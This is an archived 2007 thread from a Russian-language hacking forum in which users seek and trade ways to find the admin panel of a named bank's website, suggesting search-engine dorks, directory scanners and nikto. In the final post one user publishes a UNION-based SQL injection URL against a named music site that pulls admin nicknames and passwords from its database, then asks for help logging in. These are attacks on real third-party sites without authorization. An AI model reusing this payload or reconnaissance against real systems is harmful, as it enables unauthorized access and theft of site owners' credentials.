ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
Вопрос по обнаружению админок на сайте |
06.08.2007, 21:37
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591
Репутация:
123
|
|
Вопрос по обнаружению админок на сайте
Народ, подскажите какие есть способы найти админку на сайте, очень интересует, много всего перепробовал...
Есть сайт msk-bank.ru, никак не могу найти
|
|
|
06.08.2007, 21:43
|
|
Постоянный
Регистрация: 27.08.2006
Сообщений: 367
Провел на форуме:
2009677
Репутация:
472
|
|
первым делом проверь на robots.txt, затем поскань структуру сайта сканером, можно пройтись поисковиком, ручной подбор также использовать можно.
|
|
|
|
06.08.2007, 21:47
|
|
Banned
Регистрация: 04.01.2007
Сообщений: 193
Провел на форуме:
4213286
Репутация:
728
|
|
главный способ по обнаружению админок это inurl:"site" inurl:"admin"
но по ходу на сайте msk-bank.ru нет админки , мож я ошибаюсь
Последний раз редактировалось RAUL07; 06.08.2007 в 21:52..
|
|
|
|
07.08.2007, 00:26
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100
Репутация:
773
|
|
админок это inurl:"site" inurl:"admin"
тогда уж лучше inurl:"admin" site:'site'
|
|
|
|
07.08.2007, 00:31
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
Сканер директорий юзать надо)
Не знаю, что в пабле валяется нормальное, но при наличии хорошей базы-словаря можно найти много чего)
|
|
|
|
07.08.2007, 02:19
|
|
Новичок
Регистрация: 04.08.2007
Сообщений: 4
Провел на форуме:
13391
Репутация:
0
|
|
название сканера можно в студию?  |
|
|
|
07.08.2007, 02:50
|
|
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772
Репутация:
517
|
|
Писал вещичку на питоне.. легкие сайты с широких каналов валит
Ps Пробей домены на этом же айпи/хосте, можт у админки адрес другой. врятли бы и другой айпи ей давали
хотя я гемороился пару раз ) |
|
|
|
07.08.2007, 09:33
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
В избранном на античате есть pelmeshka сканер. вообще их ооочень много. выбирай на вкус. я иногда юзаю nikto
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
07.08.2007, 09:39
|
|
Постоянный
Регистрация: 08.08.2005
Сообщений: 782
Провел на форуме:
6573706
Репутация:
1419
|
|
http://forum.antichat.ru/thread40031.html
|
|
|
|
08.08.2007, 01:24
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591
Репутация:
123
|
|
rap.ru
На данном сайте существует бага, скуль
http://www.rap.ru/page.php?path=/survey&survey_id=-1+union+select+1,2,concat(Nick,char(58),Passwd),4+ from+Admins/*
а также есть админка
http://www.rap.ru/admin
Однако пароли не подходят, поиск других админок ничего не дал, может кто родскажет, что к чему и почему ничего не получается?
P.S. сканирование Nikto дало помимо всего такой результат -
+ /~root - Enumeration of users is possible by requesting ~username (responds with Forbidden for real users, not found for non-existent users) (GET).
Не совсем понимаю, что это значит.
Последний раз редактировалось Termin@L; 08.08.2007 в 01:32..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
